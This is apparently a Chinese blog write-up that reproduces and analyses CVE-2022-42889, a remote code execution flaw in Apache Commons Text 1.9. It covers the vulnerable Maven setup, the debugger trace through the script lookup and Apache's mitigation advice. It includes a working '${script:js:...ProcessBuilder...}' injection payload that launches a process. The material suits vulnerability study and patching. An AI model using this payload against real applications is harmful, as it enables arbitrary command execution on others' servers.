【CVE-2022-42889】Apache Commons Text RCE
介绍组件介绍
Apache Commons Text组件通常在开发过程中用于占位符和动态获取属性的字符串编辑工具包,Demo举例:
import org.apache.commons.text.StringSubstitutor;
class Demo{
public static void main(String[] args){
String resolvedString = StringSubstitutor
.replaceSystemProperties("You are running with java.version = ${java.version} and os.name = ${os.name}.");
System.out.println(resolvedString);
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.setEnableSubstitutionInVariables(true); // Allows for nested $'s.
final String text = interpolator.replace("Base64 Decoder:${base64Decoder:SGVsbG9Xb3JsZCE=}\n"
+ "Date: ${date:yyyy-MM-dd}\n" + "DNS: ${dns:address|apache.org}\n"
+ "Environment Variable:${env:USERNAME}\n"
+ "Script: ${script:javascript:3 + 4}\n" + "System Property: ${sys:user.dir}\n");
System.out.println(text);
}
}输出:
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123161303359-353935766.png
一般用于数据库查询前的语句替换,或者页面输出的时候替换。
漏洞介绍
环境搭建
idea创建Maven项目,导入如下依赖:<dependencies>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-configuration2</artifactId>
<version>2.7</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-lang3</artifactId>
<version>3.12.0</version>
</dependency>
</dependencies>
测试代码:package org.test;
import org.apache.commons.text.StringSubstitutor;
public class Main {
public static void main(String[] args) {
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
// String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder(\"calc\").start()}");
String payload = "${script:js:new java.lang.ProcessBuilder(\"calc\").start()}";
interpolator.replace(payload);
}
} 复现
运行测试代码
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123161714215-150497569.png
只有当软件使用StringSubstitutor API而没有正确处理任何不受信任的输入时才会受到攻击。apache推荐的解决方案是“对任何不可信任的输入进行适当的验证和过滤”。
分析
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123161737499-196583514.png
在org.apache.commons.text.lookup.InterpolatorStringLookup#lookup中下两个断点,这里lookup方法提取”:“后的部分作为 prefix 值,然后根据 stringLookupMap 提取其对应的 lookup 实例化对象。
StringSubstitutor.replace方法把${}中的字符截取出来进行下一步处理
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123161755128-946746260.png
传到lookup方法,获取到prefix值为script
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123161804746-1167472039.png
根据 stringLookupMap 提取其对应的 lookup 实例化对象,最后通过调用ScriptEngineManager执行代码。
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123162005224-560976397.png
https://img2024.cnblogs.com/blog/2284411/202401/2284411-20240123162012474-394911352.png
参考链接
https://mp.weixin.qq.com/s/5B8MjKNB9UrsV6D-dKwTng
https://www.cnblogs.com/wh4am1/p/16795499.html
https://commons.apache.org/proper/commons-text/userguide.html
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]